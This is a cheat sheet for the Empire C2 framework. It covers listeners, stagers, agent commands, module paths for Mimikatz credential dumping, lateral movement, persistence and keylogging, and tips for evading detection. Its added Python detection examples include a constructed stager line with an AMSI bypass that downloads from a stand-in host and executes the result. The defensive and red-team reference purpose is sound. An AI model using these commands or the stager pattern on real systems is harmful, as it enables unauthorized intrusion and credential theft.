
# Empire Framework Cheat Sheet


## Overview

Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure-Python 3 Linux/macOS agent. It provides a powerful command-and-control (C2) infrastructure for red team operations, penetration testing and adversary emulation.

**Warning:** Empire is a security testing tool that should only be used in environments where you have explicit permission to do so.

## Installation

### From GitHub
```bash
# Clone the repository (--recursive also pulls the submodules the installer expects)
git clone --recursive https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh
```

### Using Docker
```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container. 1337 is the REST API port and 5000 the Socket.IO port
# used by Starkiller and the client. Every listener port you intend to use
# must be published with an additional -p flag as well, or agents outside
# the container will never reach the listener.
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```

### On Kali Linux
```bash
# Install from the package manager
sudo apt update
sudo apt install powershell-empire
```

## Basic Usage

### Starting Empire
```bash
# Start the Empire server (Empire 3.x single-binary syntax)
sudo empire

# Start with the REST API enabled (Empire 3.x; Starkiller needs the API)
sudo empire --rest --username <username> --password <password>

# Empire 4+ runs the server and the client as two processes; the REST API is
# always on and its credentials live in empire/server/config.yaml
./ps-empire server
./ps-empire client
# Kali package equivalents: powershell-empire server / powershell-empire client
```

### Using Starkiller (GUI)
```bash
# Starkiller is an Electron application; it is not published as an npm
# package. Download the prebuilt release for your OS from the Starkiller
# GitHub releases page, run it and point it at the Empire REST API:
#   URL: http://<empire-host>:1337   credentials: the API username/password above

# Empire 5+ bundles Starkiller with the server: once `./ps-empire server`
# is running, open it in a browser instead
xdg-open http://localhost:1337/index.html
```

### Empire CLI Navigation

| Command | Description |
|---|---|
| `help` | Display the help menu |
| `menu` | Return to the main menu |
| `back` | Go back one menu level |
| `exit` | Exit Empire |
| `usemodule <module>` | Select a module to use |
| `usestager <stager>` | Select a stager to use |
| `uselistener <listener>` | Select a listener to use |
| `interact <agent>` | Interact with an agent |
| `searchmodule <term>` | Search for modules |

## Listeners

### Creating a Listener
```bash
# In the Empire CLI
listeners
uselistener http
set Name http_listener
# Host is the address agents call back to: use the IP/hostname the targets can actually reach
set Host 192.168.1.100
set Port 8080
execute
```

### Common Listener Options

| Option | Description |
|---|---|
| `Name` | Name for the listener |
| `Host` | IP/hostname used for staging (what agents call back to) |
| `Port` | Port the listener binds |
| `CertPath` | Certificate path for HTTPS listeners |
| `DefaultDelay` | Agent callback delay, in seconds |
| `DefaultJitter` | Jitter applied to the delay, as a fraction (0.0-1.0) |
| `DefaultProfile` | Default communication profile (request URIs, User-Agent, extra headers) |
| `KillDate` | Date after which the agent exits (MM/DD/YYYY) |
| `WorkingHours` | Hours during which the agent calls back (e.g. 09:00-17:00) |

### Listener Management
```bash
# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener
```

## Stagers

### Generating a Stager
```bash
# In the Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate
```

### Common Stager Types

| Stager | Description |
|---|---|
| `windows/launcher_bat` | BAT file launcher |
| `windows/launcher_vbs` | VBS script launcher |
| `windows/launcher_powershell` | PowerShell launcher |
| `multi/launcher` | Multi-platform one-liner launcher (PowerShell or Python, depending on the listener's agent language) |
| `osx/launcher` | macOS launcher |
| `linux/launcher` | Linux launcher |
| `windows/dll` | DLL launcher |
| `windows/macro` | Office macro launcher |
| `windows/hta` | HTA launcher |

Stager names differ between Empire releases; `usestager` followed by Tab lists the ones present in your install.

## Agents

### Agent Commands
```bash
# List all agents
agents

# Interact with an agent (names are assigned at check-in; see rename below)
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell cmdlet: on the PowerShell agent, shell is evaluated by
# PowerShell itself, so cmdlets work here too
shell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit the agent menu
back
```

### Agent Management
```bash
# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set the sleep interval (seconds) and jitter (fraction 0.0-1.0) from the agent menu
sleep 30 0.2

# Show system information for the agent's host
sysinfo
```

## Modules

### Using Modules
```bash
# List available modules (tab completion)
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Review the module's options, then set them. Agent is required when the
# module is selected from the main menu rather than from an agent menu
info
set Agent C2AGENT123
set Username administrator

# Execute the module
execute
```

### Common Module Categories

Module paths below are the Empire PowerShell module names; they are version-specific, so confirm them with `searchmodule` or tab completion in your install.

#### Credential Access
```bash
# Dump credentials from LSASS memory with Mimikatz
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump the SAM database
usemodule powershell/credentials/mimikatz/sam

# Dump LSA secrets
usemodule powershell/credentials/mimikatz/lsadump
```

#### Situational Awareness
```bash
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
```

#### Lateral Movement
```bash
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PsExec-style lateral movement (service creation over SMB)
usemodule powershell/lateral_movement/invoke_psexec

# WinRM (PowerShell Remoting) lateral movement
usemodule powershell/lateral_movement/invoke_psremoting
```

#### Persistence
```bash
# Registry persistence (user-level)
usemodule powershell/persistence/userland/registry

# Scheduled task persistence (user-level)
usemodule powershell/persistence/userland/schtasks

# WMI event subscription persistence (requires elevation)
usemodule powershell/persistence/elevated/wmi
```

## Advanced Features

### Malleable C2 Profiles
```bash
# The plain http listener takes a comms profile string of the form
#   <uri1>,<uri2>,...|<User-Agent>|<Header:Value>|...
# Empire's default profile is a well-known indicator, so change it before
# an engagement (example value; pick URIs and a User-Agent that fit the target)
uselistener http
set DefaultProfile /api/v2/status,/static/app.js,/health|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36

# For Cobalt Strike-style Malleable C2 profiles use the http_malleable
# listener; profiles live in the server's data/profiles directory and are
# selected by name (tab-complete it)
uselistener http_malleable
set Profile <profile-name>
execute
```
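The profile string is what shapes every request the agent sends, and Empire's default one is a well-known indicator. The following Python is an added example, not Empire's own code: it parses a DefaultProfile string on the `<uris>|<User-Agent>|<Header:Value>...` convention, renders the requests an agent configured with it would emit, and then runs the same profile as a matcher over a few constructed proxy-log lines. The log format, the `Accept` header, and all hosts and addresses are made up for the example.

```python
"""Parse an Empire http-listener DefaultProfile string and use it to (a) show
the requests an agent configured with it would send and (b) flag matching
requests in web-proxy logs.  Added example, not Empire's own code.

Format assumed (the convention the listener's help text describes):
    <uri1>,<uri2>,...|<User-Agent>|<Header1:Value1>|<Header2:Value2>...
"""
from dataclasses import dataclass, field
import re


@dataclass
class CommsProfile:
    uris: list
    user_agent: str
    headers: dict = field(default_factory=dict)


def parse_profile(profile: str) -> CommsProfile:
    """Split a DefaultProfile string into URIs, User-Agent and extra headers.

    Raises ValueError on input that could not have come from a working
    listener (no URIs, a URI without a leading '/', a header without a colon)
    so bad input fails loudly instead of silently matching nothing.
    """
    parts = profile.split("|")
    if len(parts) < 2:
        raise ValueError("profile needs at least '<uris>|<user-agent>'")
    uris = [u.strip() for u in parts[0].split(",") if u.strip()]
    if not uris or not all(u.startswith("/") for u in uris):
        raise ValueError("every URI must be non-empty and start with '/'")
    headers = {}
    for raw in parts[2:]:
        if ":" not in raw:
            raise ValueError(f"header {raw!r} is not 'Name:Value'")
        name, value = raw.split(":", 1)
        headers[name.strip()] = value.strip()
    return CommsProfile(uris, parts[1].strip(), headers)


def request_lines(profile: CommsProfile, host: str) -> list:
    """Render the GET request headers the agent would emit for each URI."""
    out = []
    for uri in profile.uris:
        lines = [f"GET {uri} HTTP/1.1", f"Host: {host}",
                 f"User-Agent: {profile.user_agent}"]
        lines += [f"{k}: {v}" for k, v in profile.headers.items()]
        out.append("\r\n".join(lines))
    return out


# Constructed proxy log lines: client server method url "user-agent"
PROXY_LOG = """\
10.0.0.5 203.0.113.10 GET http://203.0.113.10/admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.7 198.51.100.20 GET http://198.51.100.20/news.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
10.0.0.5 203.0.113.10 POST http://203.0.113.10/login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.9 192.0.2.30 GET http://192.0.2.30/index.html "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')


def match_profile(log_text: str, profile: CommsProfile) -> list:
    """Return (client, server, path) for every request whose path is one of
    the profile's URIs *and* whose User-Agent equals the profile's.  Requiring
    both keeps a single common path such as /news.php from firing on its own."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the sweep
        client, server, _method, url, ua = m.groups()
        path = re.sub(r"^https?://[^/]+", "", url).split("?", 1)[0]
        if path in profile.uris and ua == profile.user_agent:
            hits.append((client, server, path))
    return hits


# Empire's stock http profile (the value the listener ships with)
EMPIRE_DEFAULT = ("/admin/get.php,/news.php,/login/process.php|"
                  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")

if __name__ == "__main__":
    prof = parse_profile(EMPIRE_DEFAULT + "|Accept:*/*")  # Accept header added for the example
    print("\n\n".join(request_lines(prof, "203.0.113.10")))
    for hit in match_profile(PROXY_LOG, prof):
        print("Empire default-profile beacon:", hit)
```

Run the same matcher against your own custom profile before an engagement: if the blue team's proxy logs can pick it out this easily, the profile needs more work than a changed User-Agent.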

### OPSEC Considerations
```bash
# Set the agent kill date (listener option, MM/DD/YYYY; applies to agents staged afterwards)
set KillDate 01/01/2025

# Restrict callbacks to working hours
set WorkingHours 09:00-17:00

# Increase the agent sleep time: 300 seconds with 30% jitter. Jitter is a
# fraction between 0.0 and 1.0, not a percentage, so `sleep 300 30` is out of range
sleep 300 0.3
```
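To see how these settings interact, here is an added Python model (not the agent's own code) of the check-in schedule produced by DefaultDelay, DefaultJitter, WorkingHours and KillDate from the Common Listener Options table above, together with the agent-side `sleep <delay> <jitter>` command. It assumes a symmetric jitter window from delay*(1-jitter) to delay*(1+jitter), a working-hours window that includes its start and excludes its end, and a kill date on which the agent stops before its first check-in; confirm those details against the agent source for your version.

```python
"""Model of how DefaultDelay / DefaultJitter / WorkingHours / KillDate (and
the agent-side `sleep <delay> <jitter>` command) shape an agent's check-in
schedule.  Added example modelling the documented behaviour of these options;
it is not the Empire agent's own code.

Assumptions (not taken from the page): symmetric jitter window
[delay*(1-jitter), delay*(1+jitter)], working hours inclusive of the start and
exclusive of the end, and no check-in on or after the kill date.
"""
from datetime import datetime, date, time, timedelta
import random


def parse_working_hours(spec: str):
    """'09:00-17:00' -> (time(9, 0), time(17, 0)); rejects a wrapped window."""
    start, end = spec.split("-")
    t0, t1 = time.fromisoformat(start), time.fromisoformat(end)
    if t1 <= t0:
        raise ValueError("working hours must not wrap past midnight")
    return t0, t1


def parse_kill_date(spec: str) -> date:
    """The listener's KillDate option uses MM/DD/YYYY."""
    return datetime.strptime(spec, "%m/%d/%Y").date()


def sleep_interval(delay: int, jitter: float, rng=random) -> int:
    """Seconds to sleep before the next check-in.

    jitter is a fraction 0.0-1.0 (the listener's DefaultJitter); a value such
    as 30 is out of range and is rejected instead of producing a nonsense delay.
    """
    if not 0.0 <= jitter <= 1.0:
        raise ValueError(f"jitter must be in [0.0, 1.0], got {jitter}")
    lo = round(delay * (1 - jitter))
    hi = round(delay * (1 + jitter))
    return lo if lo == hi else rng.randint(lo, hi)


def next_checkin(now: datetime, delay: int, jitter: float,
                 working_hours=None, kill_date=None, rng=random):
    """Datetime of the next check-in, or None when the kill date is reached.

    Working hours are enforced on the candidate time: a check-in that would
    land before the window is pushed to the window's start, one at or after
    the end is pushed to the next day's start.
    """
    candidate = now + timedelta(seconds=sleep_interval(delay, jitter, rng))
    if working_hours:
        start, end = working_hours
        if candidate.time() < start:
            candidate = datetime.combine(candidate.date(), start)
        elif candidate.time() >= end:
            candidate = datetime.combine(candidate.date() + timedelta(days=1), start)
    if kill_date and candidate.date() >= kill_date:
        return None
    return candidate


def schedule(start_iso: str, delay: int, jitter: float, working_hours=None,
             kill_date=None, seed: int = 0, max_steps: int = 1000) -> list:
    """Simulate check-in times from start_iso until the kill date (or
    max_steps entries); returns ISO-8601 strings so runs are easy to compare."""
    rng = random.Random(seed)
    wh = parse_working_hours(working_hours) if working_hours else None
    kd = parse_kill_date(kill_date) if kill_date else None
    t = datetime.fromisoformat(start_iso)
    out = []
    while t is not None and len(out) < max_steps:
        out.append(t.isoformat())
        t = next_checkin(t, delay, jitter, wh, kd, rng)
    return out


if __name__ == "__main__":
    # An agent started late on New Year's Eve with the page's OPSEC settings
    for stamp in schedule("2024-12-31T16:50:00", 300, 0.3, "09:00-17:00", "01/01/2025"):
        print("check-in at", stamp)
```

Two things the model makes visible: with jitter 0.3 the 300-second beacon already spreads over a 210 to 390 second window, and the working-hours clamp produces a very regular first check-in at exactly 09:00 each day, which is itself a pattern a defender can key on.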

### Data Collection and Exfiltration
```bash
# Keylogging module
usemodule powershell/collection/keylogger

# Clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Screenshot module
usemodule powershell/collection/screenshot
```

## Troubleshooting

### Common Issues

1. **Connection problems**
   ```bash
   # Check that the listener is running
   listeners

   # Verify firewall settings on the Empire host
   sudo iptables -L

   # Check for port conflicts
   ss -tuln | grep <port>    # or: netstat -tuln | grep <port>
   ```

2. **Agent not checking in**
   ```bash
   # Verify the agent is still listed and note its last check-in time
   agents

   # Then check network connectivity from the target to Host:Port, and
   # compare the listener's DefaultDelay/DefaultJitter/WorkingHours with the
   # time since the last check-in before assuming the agent is dead
   ```

3. **Module execution failures**
   ```bash
   # Check the module's requirements and options
   info

   # Verify agent privileges
   shell whoami

   # Try running in a different process context
   usemodule powershell/management/psinject
   ```

## Defensive Measures

### Detection Methods
- PowerShell Script Block Logging (Event ID 4104 records the decoded script, even for `-EncodedCommand` launchers)
- PowerShell Module Logging (Event ID 4103)
- AMSI (Antimalware Scan Interface)
- Network traffic analysis (Empire's stock comms profile URIs and User-Agent are well-known indicators)
- Behavioural analysis (e.g. PowerShell spawned by an Office application, which is what the macro and HTA stagers produce)

### Prevention Techniques
```powershell
# Enable PowerShell Script Block Logging. Use the native policy key: the
# Wow6432Node path only affects 32-bit PowerShell. New-Item creates the key
# when it does not exist yet.
$sbl = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1 -Type DWord

# Enable PowerShell Module Logging for all modules
$ml = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1 -Type DWord
Set-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*"

# Constrained Language Mode: this line only affects the current session and is
# undone by starting a new powershell.exe, so it is a demonstration, not a
# control. Enforce it fleet-wide through an AppLocker or WDAC script policy.
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```
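With script block logging and process-creation command-line auditing enabled, the launcher ends up in the logs even when it was passed as `-EncodedCommand`. The following Python triage script is an added example, not code from Empire or Microsoft: it pulls the base64 UTF-16LE payload out of a constructed Event ID 4688 command line, decodes it, and scores it against substrings that characterise Empire's PowerShell launcher (the AmsiUtils/amsiInitFailed reflection trick, a WebClient download, IEX of a `-join[Char[]]` buffer). The encoded sample is built from a harmless lookalike script written for the example, not a real stager, and the indicator weights and threshold are the example's own choices.

```python
"""Triage of process-creation command lines for Empire-style PowerShell
launchers.  Added example (not Empire's or Microsoft's code) showing what the
logging enabled above gives you: decode -EncodedCommand payloads and look
for the strings Empire's PowerShell stager is known for.

The sample log values are constructed; the encoded payload is built from a
harmless lookalike script, not from a real Empire stager.
"""
import base64
import re
import shlex

# Substrings that together characterise Empire's launcher.  Weighted so one
# generic hit (IEX alone is common in admin scripts) does not page anyone.
# Weights are this example's own choice.
INDICATORS = {
    "amsiutils": 3,
    "amsiinitfailed": 3,
    "net.webclient": 1,
    "downloaddata": 1,
    "downloadstring": 1,
    "iex": 1,
    "invoke-expression": 1,
    "-join[char[]]": 2,
    "frombase64string": 1,
}
# Empire's launcher switch pattern: -noP -sta -w 1 -enc <b64>
LAUNCHER_SWITCHES = re.compile(r"-nop\b.*-sta\b.*-w\s+1\b.*-e(nc|ncodedcommand)?\b", re.I)
# PowerShell accepts any unique prefix of -EncodedCommand; cover the usual ones
ENC_FLAG = re.compile(r"^-e(c|nc|ncodedcommand)?$", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries -EncodedCommand, else None.

    PowerShell expects base64 of UTF-16LE text.  Anything that fails to decode
    is reported as None rather than raising, so a deliberately mangled argument
    cannot crash the pipeline (the switch pattern still scores it below).
    """
    try:
        args = shlex.split(cmdline, posix=True)
    except ValueError:  # unbalanced quotes in the logged command line
        args = cmdline.split()
    for i, a in enumerate(args[:-1]):
        if ENC_FLAG.match(a):
            try:
                return base64.b64decode(args[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_script(script: str):
    """Return (score, sorted indicator names) for a decoded script body.
    Whitespace and case are stripped because Empire randomises both."""
    text = re.sub(r"\s+", "", script.lower())
    found = sorted(k for k in INDICATORS if k in text)
    return sum(INDICATORS[k] for k in found), found


def triage(cmdline: str, threshold: int = 4) -> dict:
    """Classify one 4688 command line: verdict, score, matched indicators,
    whether the Empire switch pattern was present, and whether a payload
    could be decoded."""
    switches = bool(LAUNCHER_SWITCHES.search(cmdline))
    script = decode_encoded_command(cmdline)
    score, found = score_script(script) if script else (0, [])
    if switches:
        score += 2
    return {"suspicious": score >= threshold, "score": score,
            "indicators": found, "launcher_switches": switches,
            "decoded": script is not None}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed lookalike with the shape of Empire's stager; it does nothing useful
LOOKALIKE = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|?{$_}|"
             "%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)};"
             "$wc=New-Object System.Net.WebClient;"
             "$data=$wc.DownloadData('http://203.0.113.10/admin/get.php');"
             "IEX (-join[Char[]]$data)")

# Constructed Event ID 4688 NewProcessCommandLine values
SAMPLE_4688 = [
    "powershell -noP -sta -w 1 -enc " + encode_command(LOOKALIKE),
    "powershell.exe -ExecutionPolicy Bypass -File C:/scripts/nightly-backup.ps1",
    "powershell -noP -sta -w 1 -enc not_base64!!",
]

if __name__ == "__main__":
    for line in SAMPLE_4688:
        print(triage(line))
```

For 4104 script block events the text is already decoded, so `score_script` applies directly to the ScriptBlockText field; 4688 only carries the command line when "Include command line in process creation events" is enabled in the audit policy.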

## Resources

- [BC Security GitHub](LINK_4)
- [Empire Wiki](LINK_4)
- [Starkiller GitHub](LINK_4)
- [MITRE ATT&CK - Empire](LINK_4)

*This cheat sheet is a reference for using Empire in security testing scenarios. Always make sure you have proper authorization before using this tool in any environment.*